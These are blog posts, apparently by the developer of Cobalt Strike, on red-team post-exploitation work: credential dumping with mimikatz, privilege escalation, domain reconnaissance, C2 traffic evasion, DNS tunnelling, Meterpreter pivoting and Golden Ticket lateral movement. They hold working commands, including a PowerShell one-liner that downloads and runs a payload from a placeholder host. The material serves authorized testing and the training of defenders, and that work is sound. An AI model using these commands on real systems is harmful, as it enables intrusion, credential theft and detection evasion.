
My Favorite PowerShell Post-Exploitation Tools

February 25, 2015

PowerShell became a key part of my red team toolkit in 2014. Cobalt Strike 2.1 added PowerShell support to the Beacon payload and this has made an amazing library of capability available to my users. In this post, I’d like to take you through a few of my favorite collections of PowerShell scripts.


PowerSploit

Let’s start with PowerSploit. This is a post-exploitation toolkit originally put together by Matt Graeber with contributions from Chris Campbell, Joe Bialek, and others. When I use Beacon, this toolset is almost a drop-in replacement for features that I would normally need Meterpreter to get to.

For example, if I want to use mimikatz to dump plaintext credentials, I simply import the Exfiltration/Invoke-Mimikatz.ps1 script and call the Invoke-Mimikatz cmdlet. Simple.
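
Here is a minimal sketch of that workflow from a Beacon console, assuming Beacon's powershell-import and powershell commands and a local copy of PowerSploit (the path is illustrative):

powershell-import /opt/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1
powershell Invoke-Mimikatz -DumpCreds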

PowerSploit also features several great tools to steal credentials in other ways, log keystrokes, and take screenshots.

PowerUp

Every Christmas, I ask Santa for a privilege escalation vulnerability scanner. This has long made sense to me. When I have access to a system, I am in a good position to conduct automated reconnaissance and identify a known weakness to elevate with. Will Schroeder answered my wish with the PowerUp tool. This PowerShell script interrogates the system in several ways to find a privilege escalation opportunity. It even offers cmdlets to help you take advantage of the misconfigurations and weaknesses it finds. To use PowerUp, I just import PowerUp.ps1 into Beacon and run the Invoke-AllChecks cmdlet.

PowerView

Last on my list is PowerView (also by Will Schroeder). This script is a full toolkit to interrogate a domain for hosts, users, and complex trust relationships. I probably use less than 10% of its potential capability right now. I tend to use PowerView to list hosts on a network and to quickly find out where I may have admin rights with my current token. It has become one of the first tools I reach for during network reconnaissance, and it has eliminated the need to scan for targets in many cases. My favorite PowerView cmdlets are Invoke-Netview and Invoke-FindLocalAdminAccess.
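
A rough sketch of that reconnaissance flow in a Beacon console, again assuming powershell-import and powershell (the path to PowerView.ps1 is illustrative):

powershell-import /opt/PowerView/powerview.ps1
powershell Invoke-Netview
powershell Invoke-FindLocalAdminAccess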


Another Night, Another Actor

February 19, 2015

Early last year, I got a frantic call from a customer. They needed to make a small change to Beacon's communication pattern, and quickly. This customer had been asked to spend a week with a network defense team and train them on different attacker tactics. Each day, my customer had to show the network defense team all of their indicators and walk them through each of their activities. After a few days, this network defense team was able to zero in on Cobalt Strike's Beacon, and the customer was having trouble conducting other types of training activity because of this.

A blue training audience gets the most benefit from a red team’s activity when the red team shares their indicators, tactics, and knowledge with them. Clear indicator information allows the blue team to look at their sensors and see what they missed when they tried to put the story together. An open discussion of favored tactics (e.g., ways to do lateral movement, techniques like the Golden Ticket, etc.) allows a blue team to address major gaps in their defenses.

For red teams, openness comes at a cost. Tools and capabilities are expensive to buy or time-consuming to build. A red team’s effectiveness comes down to skilled operators and tools that give them freedom to work in a network. You need both. A poor operator will misuse a good tool. Depending on the maturity of the training audience and environment, a skilled operator may find themselves completely unable to operate without good tools to support them.

When a red team gives up all of their operating information, they’ve given their training audiences a gift-wrapped roadmap to detect their activity now and into the future. It’s a lot harder to play the role of an unknown adversary when your tools are well understood by the training audience.

To deal with this problem, most red teams choose to keep information about their tools and tactics close hold. They’re relying on a strategy of obscurity to protect their investment and to extend the productive life of their current technologies. This is at direct odds with what a red team should offer.

I think about this problem a lot. I sell a public solution that allows red teams to operate. I do not have the luxury of obscurity. I also don’t want obscurity. I want the training audiences I work with to get the most benefit possible from the red team activity my customers and I conduct. This means my customers need to feel safe disclosing details about their operations and their use of my tools.

I’ve made some headway on this problem and it’s one of the things in Cobalt Strike I’m most proud of.

On-disk, Cobalt Strike has its Artifact Kit. This is my source code framework to build all of Cobalt Strike’s executables and DLLs. My customers get the source code to this framework and they have the freedom to change this process and introduce other techniques to evade anti-virus. Cobalt Strike also plays nice with the Veil Evasion Framework. It’s trivial to export one of Cobalt Strike’s proprietary stagers in a Veil-friendly format too.

Network indicators are another story. Once a blue team understands what your tool looks like on the wire, it’s generally game over for that capability. Cobalt Strike has a good handle on this problem too. Malleable C2 lets Cobalt Strike’s end-users change Cobalt Strike’s indicators on the wire.

Specifically:

You get to transform and define where in a POST and GET transaction Beacon stores its metadata, output, and tasks. If you want to base64 encode an encrypted task and wrap it in HTML, you're welcome to do that. If you want to stick your encrypted tasks in the middle of an image, this is trivial to do too.

You get to dress up your transaction with extra indicators. You can add whichever client and server headers you want to HTTP POST and GET transactions. You can add arbitrary parameters to your GET and POST requests. You also get to define the URLs used for each of these.

These two pieces combined together give you a lot of control over what Cobalt Strike’s Beacon looks like on the wire. If you want, you can look like known malware. Or, you can blend in with existing traffic. Or, do something in between to adjust your activity to what your training audience is ready for.
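
To make this concrete, here is a rough sketch of what the http-get portion of a Malleable C2 profile might look like. The URI, headers, and transforms below are illustrative choices, not a recommended profile:

# illustrative profile fragment: Beacon metadata rides in the Cookie header,
# and tasks come back wrapped in an HTML comment
http-get {
    set uri "/updates";

    client {
        header "Accept" "*/*";

        metadata {
            base64;
            prepend "SESSIONID=";
            header "Cookie";
        }
    }

    server {
        header "Content-Type" "text/html";

        output {
            base64;
            prepend "<!-- ";
            append " -->";
            print;
        }
    }
}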

Now, what about that customer? Sadly, Malleable C2 didn’t exist at the time of that call. We were able to figure out a one-off work-around for their situation. Today it’s a different story. Between Artifact Kit and Malleable C2, it’s quite feasible to make Cobalt Strike look like a new actor. You can do this on a weekly or even daily basis, if you need to. This flexibility is a big step towards resolving the openness versus future effectiveness conflict.


DNS Communication is a Gimmick

February 4, 2015

I added DNS Communication to Cobalt Strike in June 2013 and refined it further in July 2013. On sales calls and at conferences I get a lot of questions and compliments on this feature. That’s great.

I’ve also heard the opposite. I’ve heard folks say that DNS Command and Control is noisy. It’s “easy to detect”. I’ve had someone go so far as to say that it’s a gimmick.

I have a philosophy: I like options. I have a preferred way to work. I stay aware of how this preferred way may break down. When this happens, I like to know I can still work and get things done. Cobalt Strike’s DNS C2 is a great example of how this philosophy influences my development choices.

I released Beacon in the 27 Sept 2012 release of Cobalt Strike. This first Beacon could beacon over DNS or HTTP. The DNS beacon would periodically make an A record request to a domain that I, the attacker, am authoritative for. My server would provide a response that told the Beacon whether or not it should make an HTTP request to download its tasks. I built this Beacon for stealth. By checking for requests with DNS, I limit how often my compromised systems need to connect directly to me.
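
If you haven't set up authoritative DNS like this before, the requirement is simply that your server answers DNS queries for some domain or subdomain you control. One illustrative way to do that is an A record for your server plus an NS record delegating a subdomain to it (names and addresses here are placeholders):

cs      IN  A   192.0.2.10          ; your DNS server (illustrative address)
beacon  IN  NS  cs.example.com.     ; queries under beacon.example.com go to that server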


Check-in behavior like this is not easy to detect. I've had folks tell me that they see this behavior in production. One A record request every 24 hours, or every week, is not trivial to find. This is scary.

In the first half of 2013 I had several opportunities to use Cobalt Strike. I took advantage of the DNS Beacon as a persistent agent. During this time I ran into a scenario I call “the child in the well”. I would see a compromised host beacon, but it would never connect to me to download its tasks. This is a terrible situation. My compromised system can call out to me. I know it’s there. But, I can’t reach it. This happened to me twice and I knew I needed to do something about it.

I added a mode command to the DNS Beacon. This command allows the end-user to state which data channel Beacon should use to download its tasks. When a tasking is available, I communicate this channel preference to the DNS Beacon in my 4-byte A record response.

I added modes to communicate over HTTP, DNS A records, and DNS TXT records. Each of these channels has its purpose, and I allow the user to switch back and forth between them for each deployed DNS Beacon.
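
Switching is one command per deployed Beacon. Assuming the mode command takes the channel name as its argument, it looks like this:

mode http
mode dns
mode dns-txt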

The HTTP data channel is the default. The compromised system connects to me with a GET request to download its tasks. It uses a POST request to send output when it’s available.

If I run into a child in the well scenario I have a choice between the two DNS data channels.

I used to use Beacon primarily as a lifeline to send sessions to other team servers. The A record channel is in the spirit of this original use case. I can task the Beacon and it will download its tasking 4 bytes at a time. If the system can beacon to me, then I have some way to control it. The A record data channel isn't efficient, but it works in a pinch.

I added the TXT record channel at the same time I built a SOCKS proxy server into Beacon. This was July 2013. I built these capabilities into Beacon to keep with an offense-in-depth philosophy. If I can't get out of a network on any channel except DNS, I need a way to continue to work. I saw pivoting as essential to this, so I built the SOCKS proxy server. The TXT record channel is suitable for tunneling some traffic through a Beacon.

I hope this post helps shine light on how I use DNS for covert communication. As a beacon with a high sleep time, it's stealthy. As a data channel, it's useful when there are no other options. Which option makes sense will depend on your context. The ability to match the tool to the context comes from mature tradecraft.


How I tunnel Meterpreter through Beacon

January 28, 2015

I write so many blog posts about Beacon, I should just give up and call this the Beacon blog. Beacon is Cobalt Strike’s post-exploitation agent that focuses on communication flexibility and added covert channels.

It’s also possible to tunnel Meterpreter through Beacon with the meterpreter command. In this blog post, I’ll explain how this feature works.


Beacon exposes a SOCKS proxy server to allow the Metasploit Framework and third-party tools to pivot through a Beacon. Each time Beacon checks in, it exchanges pending data for these ongoing connections in both directions.

When you type ‘meterpreter’ in a Beacon, two things happen. First, I generate a task to make the Beacon check in multiple times each second. I call this interactive mode. Next, I issue a task that injects a bind_tcp stager into memory on the target. This stager binds to a random high port on 127.0.0.1. A lot of host-based firewalls ignore activity to services bound to localhost.

Once the above steps are complete, Cobalt Strike’s C2 server gets a response from the Beacon stating it’s ready to stage the Meterpreter payload. I stand up a one-time-use SOCKS-compatible port forward. This port forward ignores the client’s specification about which host to connect to. It always connects to 127.0.0.1. I do this because I want the Metasploit Framework to associate the Meterpreter session with the host’s IP, but I want it to stage to localhost.

I then start exploit/multi/handler for windows/meterpreter/bind_tcp. I configure this module to use my SOCKS-compatible port forward with the Proxies option. The Proxies option in the Metasploit Framework allows me to force an outbound Metasploit module through an arbitrary SOCKS proxy. I set RHOST to the IP address of my target.
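
Cobalt Strike drives these steps for you, but a hand-built, resource-script-style sketch of the equivalent handler setup in msfconsole would look roughly like this (addresses and ports are illustrative; the SOCKS port is wherever the one-time port forward listens):

use exploit/multi/handler
set PAYLOAD windows/meterpreter/bind_tcp
# target's address; the port forward ignores this and connects to 127.0.0.1
set RHOST 10.10.12.25
# port the injected bind_tcp stager listens on
set LPORT 4444
# the one-time SOCKS-compatible port forward
set Proxies socks4:127.0.0.1:1080
exploit -j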

The handler for Meterpreter bounces through my port forward to hit the bind_tcp stager I put into memory earlier. The payload stages over this connection and then the stager passes control to the Meterpreter payload with the same socket in the EDI register [a detail managed by the stager and the stage].

At this point, I have a Meterpreter session that tunnels through Beacon. Better, I have this session without interference from a host-based firewall (if there is one).


Cobalt Strike 2.3 – I’ve always wanted runas

January 22, 2015

Cobalt Strike 2.3 is now available. This release adds a runas command to Beacon. This command allows you to specify a username and password for any user and run a command as them. It’s useful for situations where you know an admin’s credentials and want to use them to elevate. Care to know the alternative? Shell Escalation using VBS (pg. 31, Red Team Field Manual) is what I used to do.
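
A quick sketch from a Beacon console, assuming the syntax is runas [DOMAIN\user] [password] [command] (the credentials here are made up):

runas CORP\helpdesk.admin Winter2015! cmd.exe /c whoami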

This release also adds a Cobalt Strike version of the PowerShell Web Delivery tool. This tool hosts a PowerShell script on Cobalt Strike’s web server that injects a Cobalt Strike listener into memory. This feature also generates a PowerShell one-liner that you may run on a target to get a session.
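
The generated one-liner usually looks something like this; the host, port, and URI below are illustrative placeholders:

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.0.2.10:80/update'))"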

Finally, this release addresses an incompatibility that affected DNS Beacon users. Updates to the Metasploit Framework affected Cobalt Strike’s process to encode a stage to deliver over DNS. Cobalt Strike now includes its own encoder to build the DNS Beacon stage.

For a full list of changes, please consult the release notes. Licensed users may get the latest with the built-in update program. A 21-day trial of Cobalt Strike is available too.


Indecent (Penetration Testing) Proposal

January 14, 2015

A customer reaches out to you. They’ve spent the money. They have a network defense team that innovates and actively hunts for adversary activity. They own the different blinky boxes. They have a highly rated endpoint protection product in their environment. They’re worried about the cyber attacks they see in the news. Despite this investment, they don’t know how well it works. The CEO thinks they’re invincible. The CISO has his doubts and the authority and resources to act on them. They want to know where their program stands. They call you.

You run through the options. You dismiss the idea of looking at their vulnerability management program. They have this, and they receive penetration testers on a semi-regular basis. They’re comfortable that someone’s looking at their attack surface. They’re still worried. What about something very targeted? What if someone finds a way in that they, and the myriad vendors they’ve worked with, didn’t know about?

After discussion, you get to the heart of it. They want to know how effective their network defense team is at detecting and mitigating a successful breach. The gears start to turn in your mind. You know this isn’t the time to use netcat to simulate exfiltration of data. You could download some known malicious software and run it. Or, better, you could go to one of the underground forums and pay $20 for one of the offensive showpieces available for sale. Your mind quickly flashes to a what-if scenario: what happens if you go this way and introduce a backdoor into your customer’s environment? You shake your head and promise yourself that you will look at other options later.

Wisely, you ask a few clarifying questions. You ask: what type of breach are they worried about? Of the recent high-profile breaches, what’s the one that makes them think, “could that be us?” Before you know it, you’re on a plane to New York with a diverse team. You bring an offensive expert from your team; she is a cross between operator and developer. You also bring a new hire who used to work as a cyber threat analyst within the US intelligence community. You engage with the customer’s team, which includes trusted agents from the network defense team who will not tell their peers about the upcoming engagement. The meeting is spent productively developing a threat model and a timeline for a hypothetical breach.

Your customer introduces you to another player in this engagement. Your customer pays for analyst services from a well-known threat intelligence company. This company is known for working intrusion response for high-profile breaches. A lesser-known service is the strategic guidance, analysis support, and reports they provide their customers on a subscription basis. This analyst briefs you on a real actor with the capability and intent to target a company like your customer. The hypothetical breach scenario you made with your customer is amenable to this actor’s process. The analyst briefs your team on this actor’s capabilities and unique ways of doing business. Your customer doesn’t know exactly what they want here, but they ask that, if there’s a way you can use this information to make your activity more realistic, you please do so.

You and your team leave the customer’s site and discuss the day’s meetings with a fast energy. The customer wants to hire you to play out that hypothetical breach in their environment, but they want to do this in a cost-effective way. A trusted insider will assist you with the initial access. It’s up to you to evade their blinky boxes and to work slowly. Paradoxically, the customer wants you to work slowly, but they want to put a time limit on the activity as well. They’re confident that with unlimited time, you could log the right keystrokes and locate the key resources and systems in their network. To keep the engagement tractable, they offer to assign a trusted agent to your team. This agent will white card information to allow you to move forward with the breach storyline.

The customer’s interest is the hypothetical breach and the timeline of your activity. They don’t expect their network defense team to catch every step. But, they want to know every step you took. After the engagement, they plan to analyze everything you did and look at their process and tools. They’ll ask the tough questions. How did they do? What did they see, but dismiss as benign? What didn’t they see and why? Sometimes it’s acceptable that an activity is too far below a noise threshold to catch. That’s OK. But, sometimes, there’s a detection or action opportunity they miss. It’s important to identify these and look at how to do better next time.

You look at this tall order. It’s a lot. This isn’t something your team normally does. You know you can’t just go in and execute. Your new hire with the intel background smiles. This is a big opportunity. Your developer and analyst work together to make a plan to meet the customer’s needs. Your intent is to execute the breach timeline but introduce tradecraft of the actor the threat intelligence company briefed you on. These few tricks you plan to borrow from the actor will show the customer’s team something they haven’t seen before. It will make for a good debrief later.

This engagement will require some upfront investment from your team and it may require a little retooling. You’ll need to analyze each piece of your kit and make sure it can work with the constraints of your customer’s defensive posture. You verify that you have artifacts that don’t trigger their anti-virus product. Some of the cloud anti-virus products have made trouble for your team in the past. You look at your remote access tool options. You need a payload that’s invisible to the blinky boxes and their automatic detection. If you get caught, you want to know ingenuity and analysis made it happen. You won’t give yourself up easily. At least, not in the beginning.

You also want to know that you can operate slowly. Your favorite penetration testing tools aren’t built for this. Big questions come up. How will you exfiltrate gigabytes of data, slowly and without raising alarms? You know you’ll need to build something or buy it. You also work to plan the infrastructure you’ll need to support each phase of the breach timeline. You know, for this particular engagement, it makes no sense to have all compromised systems call home to the one Kali box your company keeps in a DMZ.

As all of this planning takes place, you pause and reflect. You got into this business to make your customers better. You built a team and you convinced your management to pay them what they’re worth. You carry the weight of making sure that team is constantly engaged. Sometimes this means taking the less sexy work. Unfortunately, your competitors are in a race to the bottom. Everyone sells the same scans and vulnerability verification as penetration tests. It keeps getting worse. You know you’ll lose your best people if you try to compete this way. This engagement brings new energy to your team.

This mature customer is willing to pay for this service. The value to them is clear. They want to know how well their security operations stand up to a real-world attack. They understand that this is a task that requires expertise. They’ll pay, but they can’t and won’t pay for a long timeline. The white carding is the compromise.

You’re excited. This is something that will use the expertise you’ve collected into a cohesive team. Your customer appreciates how real the threat is. You make plans. Big plans. You wonder who else might pay for this service. You go to your sales person and brief them on the customer and this engagement. Your sales person nods in agreement. “Yes, I see it too”.


Pass-the-(Golden)-Ticket with WMIC

January 7, 2015

One of my favorite blog posts from last year was the Adversary Tricks and Treats post from CrowdStrike. They showed how one of the actors they track changed their tactics to cope with a more alert defender.

This actor, DEEP PANDA, sometimes injects a Golden Ticket into their local Kerberos ticket cache. To move laterally, this actor uses this trust to enable the RDP sticky keys backdoor on target systems. The actor then RDPs to the target and uses this backdoor to get a SYSTEM-level command shell. Nothing to it.

When I read about interesting tradecraft, I like to reproduce it in a lab. According to CrowdStrike, this actor uses wmic to pass the Golden Ticket and execute their commands on the target systems.

I stood up a test system and used kerberos_ticket_use in Beacon to ingest a Golden Ticket. I then tried to execute a command on a Windows 8 system with WMIC:

wmic /node:WIN8WORKSTATION process call create "stuff I want to run"

This command failed with an access denied. Picture a Sad DEEP PANDA face here. After some digging, I found that there’s a flag I need to specify. To pass a Kerberos ticket with WMIC, use /authority:"kerberos:DOMAIN\TARGET" on your WMIC command line. So in this case:

wmic /authority:"kerberos:CORP\WIN8WORKSTATION" /node:WIN8WORKSTATION process call create "stuff"

That’s how you pass a Golden Ticket with WMIC.
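
For completeness, the ticket itself comes from mimikatz’ kerberos::golden module, and Beacon ingests the resulting .kirbi file with kerberos_ticket_use. A rough sketch of that earlier step, with placeholder values:

mimikatz # kerberos::golden /user:Administrator /domain:CORP.LOCAL /sid:<domain SID> /krbtgt:<krbtgt NTLM hash> /ticket:golden.kirbi
beacon > kerberos_ticket_use /path/to/golden.kirbi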
